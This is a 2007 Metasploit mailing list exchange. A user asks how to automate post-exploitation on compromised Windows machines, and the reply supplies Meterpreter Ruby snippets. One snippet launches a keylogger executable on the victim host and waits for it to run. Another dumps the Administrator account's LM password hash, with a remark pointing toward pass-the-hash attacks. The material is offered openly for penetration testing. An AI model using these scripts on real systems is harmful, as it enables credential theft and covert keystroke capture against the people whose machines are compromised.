Metasploit mailing list archives

Meterpreter AutoExec?


From: jerome.athias at free.fr (Jerome Athias)
Date: Sat, 10 Nov 2007 14:57:57 +0100

Hi,

The design of Meterpreter lets you do this sort of thing in an easy
way: the Meterpreter scripts! (thanks to The Alien ;-p)
Look at /scripts/meterpreter/; you'll find the needed migrate.rb script.

Then, to launch a new process, you'll use something like:

myproc = client.sys.process.execute("C:\\keylog.exe", "/S")
continue = false
while (continue == false)
    sleep 5
    pid_list = client.sys.process.processes.collect { |x| x["pid"] }
    if (pid_list.include?(myproc.pid) == false)
        continue = true
    end
end
print_status("Keylog installed")

To dump the LM hash of the Administrator account, use:

client.core.use("priv")
max = client.priv.sam_hashes.length - 1
for i in 0..max
    if client.priv.sam_hashes[i].user_id == "500"
        adm_name = client.priv.sam_hashes[i].user_name
        adm_lanman = client.priv.sam_hashes[i].lanman
    end
end
print_status("LM hash for " + adm_name + " is " + adm_lanman)
# pass-the-hash anyone?

Then, ... just be creative & innovative!

My 2 euro cents
/JA
www.securinfos.info

Best regards to VV & the folks of MISC (don't forget about my website 
guys ;-))

CybyDude wrote:
Hi List!

Does Meterpreter support some sorta AutoExec script that can be executed post 
exploitation? I understand this sort of thing'd be possible through Ruby 
Scripts using MSF/Meterpreter API. But does MSF specifically look for 
something like autoexec (like AUTOEXEC.BAT in good old DOS)?

Basically, I'm interested in automating post exploitation measures for client 
side attacks, which may include:

1-Migration of Process to something safe before user terminates IE/OE/FF
2-Dump Hashes
3-Upload, deploy & init custom stuff like a key logger
4-Dash off a mail to the pentester about the vulnerable machine.

Could someone pls guide me in this regard?


Regards n' Best Wishes
CybyDude

